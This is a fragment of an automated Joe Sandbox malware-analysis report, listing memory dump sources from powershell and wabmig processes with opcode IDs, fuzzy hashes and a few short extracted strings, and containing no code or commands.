                                        • Opcode Fuzzy Hash: 8a8db59f2859ad3ae537842ed8e237c51006d019860bad2680974f7a3f868c3f
                                        • Instruction Fuzzy Hash: DF11C330F2015ADBEF38DE94D9887ACB772FF85229F161429C401B6190AB747989CB12
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1586c24440fcc65b2a0d420962a8dbf6fcecda9263df8488bd3131547fdce516
                                        • Instruction ID: bd75aff96e9f0029cca54900fc8301c71a37a31fe552e7710f36bb485ed96108
                                        • Opcode Fuzzy Hash: 1586c24440fcc65b2a0d420962a8dbf6fcecda9263df8488bd3131547fdce516
                                        • Instruction Fuzzy Hash: DF012B31F15360CBE35113E81815B9F27228BC1A55B050066CA019F765DF718D02C3E7
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b184c16bae20d519675da10b2e3562fe947fa2d25371ed1c3e41f74d00d2596a
                                        • Instruction ID: f8c14524ab8881567005fb791acd98de8b5b8770eec4cb97cdf85ede35b67173
                                        • Opcode Fuzzy Hash: b184c16bae20d519675da10b2e3562fe947fa2d25371ed1c3e41f74d00d2596a
                                        • Instruction Fuzzy Hash: 18015734640315CFE7908B54CC44BDAB7A2AF85704F108498EA05AF791CBB69E81CF91
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4f8b117da2eaa4d113379dbfd14043c6473abc631fe02973e75859f86695ace
                                        • Instruction ID: dbe5be5e79ddb920e4b66c51840354be82780229dcf34768efb75e631726a0cc
                                        • Opcode Fuzzy Hash: d4f8b117da2eaa4d113379dbfd14043c6473abc631fe02973e75859f86695ace
                                        • Instruction Fuzzy Hash: 74B012311451404FC201CB50C860440FB609F82124328C4CBD804CB253CB27DD03C700
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A$\Vhk
                                        • API String ID: 0-2889131009
                                        • Opcode ID: a57e09eea145165f778779c19d07c9b678edf4143dd05a519875769b80b89820
                                        • Instruction ID: cff1046089529e60ef76d6a486dca643ce333618727520a3b0ef1e256aeec51f
                                        • Opcode Fuzzy Hash: a57e09eea145165f778779c19d07c9b678edf4143dd05a519875769b80b89820
                                        • Instruction Fuzzy Hash: DE916A70E006498FDF14CFA9C9957AEBBF2FF88314F148129E815E7294EB749985CB81
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58142da85788dbba04516b347b03a7dcf71045f2a703789b2c2d396a9a5a58e3
                                        • Instruction ID: 1b32f23b8144c088990609a2c6bfdb5ff36e0d9172f186882ed89ce05638a8de
                                        • Opcode Fuzzy Hash: 58142da85788dbba04516b347b03a7dcf71045f2a703789b2c2d396a9a5a58e3
                                        • Instruction Fuzzy Hash: 5C630B31D10B1A8ADB11EF68C884699F7B1FF99300F11D79AE458B7121EB70AAD4CF81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A
                                        • API String ID: 0-3625649603
                                        • Opcode ID: b7be0dbaad608e52d9b1772fcdee7f836ea1bbe286e0600c4d377a687bb17081
                                        • Instruction ID: 114d003e73e58ab20f6b9e7604951692341b9f6b8807863de833c9f2675c9739
                                        • Opcode Fuzzy Hash: b7be0dbaad608e52d9b1772fcdee7f836ea1bbe286e0600c4d377a687bb17081
                                        • Instruction Fuzzy Hash: 33B13C70E002198FDF54CFA9C88579DBBF2FF88714F249129D815E7294EB78A845CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A
                                        • API String ID: 0-3652387145
                                        • Opcode ID: 172cdaabf0398ae43031cc48c71906f8f8b387bd0eb0ba9dfd4ed53fa68ccb47
                                        • Instruction ID: bcca1bad5fd4a20a6ad31421623d39b43dbcaa60177dbb956a658ddcfa39db92
                                        • Opcode Fuzzy Hash: 172cdaabf0398ae43031cc48c71906f8f8b387bd0eb0ba9dfd4ed53fa68ccb47
                                        • Instruction Fuzzy Hash: 60B1C170B00258DBDB1CAB79985967E7BA7BFC8700F15846EE406E7385DE38DC029B91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f836967f88c65768c2d88471b359926b3a7ccb8352b78e4c3afc177c566490e
                                        • Instruction ID: d0e54d92e02cad60e9b8b2ee1000c83cfdd29229fc0f867a3f20020987e4d445
                                        • Opcode Fuzzy Hash: 7f836967f88c65768c2d88471b359926b3a7ccb8352b78e4c3afc177c566490e
                                        • Instruction Fuzzy Hash: F8E2E831D10B1A8ADB50EF68C884699F7B1FF99300F11D79AE458B7121EB70AAD4CF81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A$\Vhk$\Vhk
                                        • API String ID: 0-2994003189
                                        • Opcode ID: b6e113b1fcab8a24dab5663371d696e1e191aa72f0fb472af2933b90f2f129c2
                                        • Instruction ID: 2b88df7b9704256b9a8d0551400a0042e5a316360c567abebf91e0e1cb0cf23c
                                        • Opcode Fuzzy Hash: b6e113b1fcab8a24dab5663371d696e1e191aa72f0fb472af2933b90f2f129c2
                                        • Instruction Fuzzy Hash: EA715B70E00259CFDB14CFA9C885B9EBBF2FF88714F149129E815E7254EB74A845CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A$\Vhk$\Vhk
                                        • API String ID: 0-2994003189
                                        • Opcode ID: f9f88f8c504634ed78393ba68dd8890cd93dffc7a7b1ee0a87df04e6607d54cf
                                        • Instruction ID: 2579d7e5a4fd55bf44d02ca030189f9a5f10ea4e5735d7720a8bb6e231e4f633
                                        • Opcode Fuzzy Hash: f9f88f8c504634ed78393ba68dd8890cd93dffc7a7b1ee0a87df04e6607d54cf
                                        • Instruction Fuzzy Hash: FE7159B0E00259CFDB14CFA9C885B9EBBF1FF88714F149129E815E72A4DB74A845CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A$\Vhk
                                        • API String ID: 0-2889131009
                                        • Opcode ID: 31dc23d51f805be474a28f903bb4d0cb234dfbd0831219f98b4f94f34dff1b18
                                        • Instruction ID: 6667b044da0aed2bf0f648690c75dfc04df27216bb2ff68be4cbe6f858ba7ca5
                                        • Opcode Fuzzy Hash: 31dc23d51f805be474a28f903bb4d0cb234dfbd0831219f98b4f94f34dff1b18
                                        • Instruction Fuzzy Hash: 80915870E006498FDF54CFA8C98579EBBF2FF88304F248129E815E7294EB749985CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Hz&$z&
                                        • API String ID: 0-3785348888
                                        • Opcode ID: 52fc626b03e3b173c5df07fc4ccce8f90018a02580ab7056fb342fcf818b461a
                                        • Instruction ID: d0ee8430d9f0474186ee24c94b69c5f902ca3b8c946ac0293c678452ed2d5de6
                                        • Opcode Fuzzy Hash: 52fc626b03e3b173c5df07fc4ccce8f90018a02580ab7056fb342fcf818b461a
                                        • Instruction Fuzzy Hash: 78123D31701306DFDB1DAB28E8986297BA2FBD9344F61492DE405CB391CFB9DC468B81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A
                                        • API String ID: 0-3625649603
                                        • Opcode ID: 08eaab35b28e8e242fd8e9c64a66671298c96418e97e7e7cde86df4c0a4bbe80
                                        • Instruction ID: 668962d538ed083e44b521c435625d2a3a96d27f3a80bc9470532508db8ebe08
                                        • Opcode Fuzzy Hash: 08eaab35b28e8e242fd8e9c64a66671298c96418e97e7e7cde86df4c0a4bbe80
                                        • Instruction Fuzzy Hash: 8CB13A70E002598FDB50CFA9C88579DBBF1FF88714F249129D815E7294EB74A845CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A
                                        • API String ID: 0-3625649603
                                        • Opcode ID: 1cb7ebc43b574e1c6b868e6f63dd6ecf9050e87545f2216f7435cdf4cfd3ef0c
                                        • Instruction ID: fe02080c4e0d1c152f39afa444da0a1e895340c8582e6341b71a7b1b8b3ae777
                                        • Opcode Fuzzy Hash: 1cb7ebc43b574e1c6b868e6f63dd6ecf9050e87545f2216f7435cdf4cfd3ef0c
                                        • Instruction Fuzzy Hash: 57512474E002199FDB18CFA9C884B9DBBB1FF88310F148129E819BB351E7759844CF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A
                                        • API String ID: 0-3625649603
                                        • Opcode ID: 3b7031d8ef800bb6600172512460213f7fdcf4cc13b2dfa1c30b705822aa49d7
                                        • Instruction ID: 00a360d2a430538cd653a3cd8bc29e2057c6372c2014ed08dc6f9736240d8a01
                                        • Opcode Fuzzy Hash: 3b7031d8ef800bb6600172512460213f7fdcf4cc13b2dfa1c30b705822aa49d7
                                        • Instruction Fuzzy Hash: 19511374E002199FDB18CFA9C884B9DBBB1FF88314F148129E819BB351EB75A844CF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A
                                        • API String ID: 0-3652387145
                                        • Opcode ID: bc05d8599f115d0343aceb4b5bd326c06ad9515257b9de6efa475acf83c71393
                                        • Instruction ID: fb756c223cd677c72df8ace03ea7a5ebca12d944c2f9bbfa994da3446a1af6ac
                                        • Opcode Fuzzy Hash: bc05d8599f115d0343aceb4b5bd326c06ad9515257b9de6efa475acf83c71393
                                        • Instruction Fuzzy Hash: A041D1B0900349DFDB10DFA9C984ADEBFB1FF88314F248129E419AB254DB799945CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A
                                        • API String ID: 0-3652387145
                                        • Opcode ID: 0c97de7f627631a57e654268dab3dd7ecc995fad0b1111141df7834eabbd116f
                                        • Instruction ID: 8019a7823d91056e25a20915a772794207a5305b73b4e55f07a64b2229d7f9aa
                                        • Opcode Fuzzy Hash: 0c97de7f627631a57e654268dab3dd7ecc995fad0b1111141df7834eabbd116f
                                        • Instruction Fuzzy Hash: D141F0B0D00349DFDB10CFA9C984ADEBBB5FF88314F208029E819AB254DB75A945CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: |
                                        • API String ID: 0-2343686810
                                        • Opcode ID: 30771c496fd73217cdb2b9975373cab920dfae4ec8a3cc7a1af649c2ea6e37a4
                                        • Instruction ID: 8da4077bf6e37c24a794a600f996a57f31adf9fdcffed0c241c668d8c46de65e
                                        • Opcode Fuzzy Hash: 30771c496fd73217cdb2b9975373cab920dfae4ec8a3cc7a1af649c2ea6e37a4
                                        • Instruction Fuzzy Hash: 25114F70B012159FDB54DB78C819B6EB7F6AF8C710F108469E94AE73A0EA399D00DB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: |
                                        • API String ID: 0-2343686810
                                        • Opcode ID: e299b0feef78098fec89806c86305cfa977c2c888b8ed009236f2dd91d73b896
                                        • Instruction ID: 46ae5446ea22b7b8872784e7b09b53c5bd6c4f87bf14ce057d6b2f267835372c
                                        • Opcode Fuzzy Hash: e299b0feef78098fec89806c86305cfa977c2c888b8ed009236f2dd91d73b896
                                        • Instruction Fuzzy Hash: A1112B75B00215DFDB44EB78C804B6EB7F6AF88710F14846AE94AE7394DA39AD009B91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 67230d254b0d41080d42c666386138712a61d305b88808a3404fb9a1b7a9f7c1
                                        • Instruction ID: 13c11621785d742b7494cdea238cff7178fe11efcff0f853b98a8be52aeb4f53
                                        • Opcode Fuzzy Hash: 67230d254b0d41080d42c666386138712a61d305b88808a3404fb9a1b7a9f7c1
                                        • Instruction Fuzzy Hash: 64E19E34B00205CFDB19DBA8D484AADBBB2FBD9310F248469E946D73A1DB35DD42CB81
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 770c4cf33f38ad6e1103016aaba006707de8e11d552ab149239cde2e6cd6b5f8
                                        • Instruction ID: 50646373bfe7f759d518f73adedebf13286c491b14528879be643b62b4e8a603
                                        • Opcode Fuzzy Hash: 770c4cf33f38ad6e1103016aaba006707de8e11d552ab149239cde2e6cd6b5f8
                                        • Instruction Fuzzy Hash: ECF0B435700216DBDB2566BEE55972BBACBEBC1720F00093DE60ACB252DE65DD0643D1
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce31488e489c4d977cb71e2ffd967f1b1c435bc020c7db9ff7c38ec6c670452e
                                        • Instruction ID: 715a86d6233ca53822cfd4b56f1a884098460c5b8ff6e632c6c85b808a967089
                                        • Opcode Fuzzy Hash: ce31488e489c4d977cb71e2ffd967f1b1c435bc020c7db9ff7c38ec6c670452e
                                        • Instruction Fuzzy Hash: 50D02B3060D35C6FC3369768A4486527FDAEBC5355F04459DF586C3182DE106801C3D1